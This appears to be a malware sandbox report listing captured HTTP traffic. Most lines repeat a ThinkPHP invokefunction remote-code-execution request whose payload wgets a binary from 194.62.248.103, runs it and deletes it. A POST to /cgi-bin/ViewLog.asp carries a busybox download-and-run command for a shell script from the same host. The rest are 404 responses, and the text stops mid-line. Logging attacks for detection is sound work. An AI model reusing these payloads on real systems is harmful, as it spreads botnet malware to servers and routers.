    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: unknownHTTP traffic detected: POST /cgi-bin/ViewLog.asp HTTP/1.1Host: 192.168.0.14:80Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: python-requests/2.20.0Content-Length: 227Content-Type: application/x-www-form-urlencodedData Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 14 Apr 2024 16:34:52 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: CherryPy/18.8.0Date: Sun, 14 Apr 2024 14:34:53 GMTVary: Accept-EncodingContent-Encoding: gzipContent-Length: 174
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCONNECTION: closeCONTENT-LENGTH: 48X-XSS-Protection: 1;mode=blockContent-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval'X-Content-Type-Options: nosniffCONTENT-TYPE: text/htmlData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><body><h1>404 Not Found</h1></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 14 Apr 2024 14:35:04 GMTConnection: CloseCache-Control: no-storeX-Content-Type-Options: nosniffX-Frame-Options: DENYContent-Security-Policy: default-src 'none'; frame-ancestors 'none'; script-src 'none'; object-src 'none'; connect-src *.ookla.com *.speedtest.net *.speedtestcustom.com
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 14 Apr 2024 15:36:12 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 724Date: Sun, 14 Apr 2024 14:35:11 GMTData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 39 39 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> /cgi-bin/ViewLog.asp</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to d
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 14 Apr 2024 14:26:19 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 193Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 64 6f 63 75 6d 65 6e 74 3a 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open document: /cgi-bin/ViewLog.asp</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Mini web server 1.0 ZTE corp 2005.Accept-Ranges: bytesConnection: closeContent-Type: text/html; charset=iso-8859-1Cache-Control: no-cache,no-storeData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6f 64 79 20 62 67 63 